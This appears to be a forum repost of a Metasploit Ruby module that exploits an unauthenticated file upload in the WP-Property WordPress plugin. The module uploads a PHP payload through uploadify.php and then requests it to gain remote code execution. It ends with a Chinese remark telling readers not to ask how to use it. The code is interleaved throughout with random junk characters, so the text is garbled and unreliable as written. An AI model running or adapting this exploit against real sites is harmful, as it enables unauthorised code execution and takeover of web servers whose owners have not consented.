: M, @0 G5 V& H& w# Q+ x8 c ## # This file is part of the Metasploit Framework and may be subject to 1 a) u: ]& Z' {1 C6 R$ v; R $ R7 L5 m8 e3 W4 z# redistribution and commercial restrictions. Please see the Metasploit % L6 k, z# v6 x* m4 f; p2 g1 d a* G! c# S2 U- }
# Framework web site for more information on licensing and terms of use. $ y# r2 X) k/ J& ?; F( c' V0 x! q. T
# http://metasploit.com/framework/ ## 4 {; L1 L7 d. {. c) ]2 S6 k' A( L& j8 W7 |8 X3 r
: c8 K! J. A& {/ p6 e# @3 q : F9 r/ A7 Z; i O' ?; | - H- ]; c4 ^7 i# l4 O9 `- y6 I" P
3 K8 q9 W ^. M! s
require 'msf/core'# C8 u" S; Y# `; f5 h0 |+ ^
require 'msf/core/exploit/php_exe' # R d* l: @, q, w, O& h3 ~7 P, e2 h+ P/ c, O' _- I6 |
class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit:hpEXE def initialize(info = {}) super(update_info(info, 'Name' => 'WordPress WP-Property PHP File Upload Vulnerability', & C* R2 V- G' G7 {. d7 o'Description' => %q{! u. h( P9 o0 y- x
This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress plugin. By abusing the uploadify.php file, a malicious user can upload a file to a temp directory without authentication, which results in arbitrary code execution. }, 'Author' => 8 K% W: `1 I6 ~8 f: C[ 7 r( t# U2 q/ i5 ~3 G'Sammy FORGIT', # initial discovery/ h! C1 u3 N/ U+ [, E/ V7 ~ Q6 c
'James Fitts <fitts.james[at]gmail.com>' # metasploit module' S# h! ?+ P, \ g# ?3 N4 x( F
],( Q" F9 C/ b, |
'License' => MSF_LICENSE,, ^: k0 ]9 s+ C
'References' =>/ c& N2 X2 w) d+ [7 W
[ , y( l* A# \9 g0 K: A3 d: J9 {[ 'OSVDB', '82656' ], l. B( ~) d/ Z3 d. A
[ 'BID', '53787' ],% t% @- ~" x) m T$ K" Y, ]; x
[ 'EDB', '18987'], - y+ a5 k) k; }! [+ [5 {3 w, I+ Q[ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]2 m |2 z- g G$ x/ [ o
],) B1 S! G1 O {$ C" P
'Payload' => 2 g; d( {% f) `2 [# a9 e- y4 {3 V{ 8 U) l/ |0 j# g( ]1 T6 ?1 h: u) C'BadChars' => "\x00"," {$ P+ f+ d9 G/ T. L; n
},, ]! p( ?0 w; }2 S. v/ F5 h/ b+ D
'Platform' => 'php',+ J/ f1 A8 ] V6 a3 e5 A
'Arch' => ARCH_PHP, 7 ^% V7 ]& b) _' M; \'Targets' => 4 `! M6 q$ p L. k: _, {6 R/ q[ " _* {0 ^5 A; }, W[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ], " |( I2 x" \5 ]* Z C[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ] % N4 w) Z+ K' V# R. }; g], " b5 t/ v7 g* b0 j' C0 {'DefaultTarget' => 0,1 W1 D8 q$ i; c! X$ H! V% i- O; S' }
'DisclosureDate' => 'Mar 26 2012'))0 r4 c6 j- ~6 `
1 _, B2 J% E+ q4 l* u$ T* H. ~register_options( C$ k3 \! O, h5 `
[ " s& n* I; |$ A. ]; [, m" zOptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])' {0 m/ ]- D( i! L
], self.class)& _# b' k' n& A
end * k. N4 Y0 ^$ Y* [5 g- ` ( C9 f/ V. l: ^def check 1 ?! n+ p" y1 muri = target_uri.path 2 M8 z# I: b B0 W0 g1 Nuri << '/' if uri[-1,1] != '/' res = send_request_cgi({ 'method' => 'GET', " [9 e& P5 ?: }% d6 m! n'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"4 ~: p* @6 Q, [: Z
}) 7 P3 f3 R2 ~/ }; S. J; V+ q4 Y, Z
if not res or res.code != 200 6 b4 H9 ~9 v+ }7 Freturn Exploit::CheckCode::Unknown 5 w7 R8 \$ h: T0 {0 @! d; ]end( y8 v I% K' H$ ]5 e+ R( B
6 X9 d/ b0 Z/ ]- A, e8 s
return Exploit::CheckCode::Appears- R( a! l \3 G: {8 r
end ! I0 P3 v% D" j8 ~, w2 Q1 t: A$ g8 C* J5 w
def exploit3 @0 |: ]/ T+ F9 g9 z* q
uri = target_uri.path5 ` N' ?' a8 W) [3 e: Y7 @
uri << '/' if uri[-1,1] != '/' peer = "#{rhost}:#{rport}" @payload_name = "#{rand_text_alpha(5)}.php" php_payload = get_write_exec_payload(:unlink_self=>true) ( a) p; }* p8 R4 p8 s& s N6 K& V" C
data = Rex::MIME::Message.new ( i- p1 d. d# a/ N6 x! A! jdata.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"") ! |* A' p, h. \7 \data.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\""), ~8 `" C$ c, W
post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_') $ x2 G2 p- A# W$ l& ~" a) e& J5 V, h0 {% e$ [
print_status("#{peer} - Uploading payload #{@payload_name}") # \' L- R5 b( fres = send_request_cgi({ 2 d3 ^2 ?% ]3 ?: e- [, U8 K'method' => 'POST',- v: U! L* j2 V; [7 G
'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php", ) i8 q% c" X! b. \: J! i8 P) p$ Z'ctype' => "multipart/form-data; boundary=#{data.bound}",, o" p- s2 U$ L) P
'data' => post_data5 G7 I* T7 G5 f4 ~) J4 v% W' O, G
}); K- f# h- O& ]8 j" a, ~- w
7 D' E( G7 j/ ?
if not res or res.code != 200 or res.body !~ /#{@payload_name}/ # U* N1 D: q: }4 }; Kfail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")' x" r& w8 G( n9 D/ p
end0 L9 F' \) I3 p8 }# }" V; y8 M
, e3 T4 U2 ^. Y$ i, i, r7 u
upload_uri = res.body* i& \" `. D5 l
, E- K" E& x& X/ G7 ^- r
print_status("#{peer} - Executing payload #{@payload_name}") ) \% m" G6 J1 `% i7 kres = send_request_raw({ ( e! V+ j f4 g'uri' => upload_uri, 4 A: N3 c8 ?, _5 R'method' => 'GET' ) w- W9 [. O4 K# q})( A' R& c# ~; a6 X$ J
end - T# M% C! n* t% _6 j3 U& c7 Bend ( f( M* W+ L5 T. X7 U4 K ; W% t1 P' k5 ^, X不要问我这写的是什么 怎么利用 我是说msf. $ B' H/ L+ B5 a7 l# Q: i- ]+ ~6 l9 A( X6 p3 y1 X+ ^% g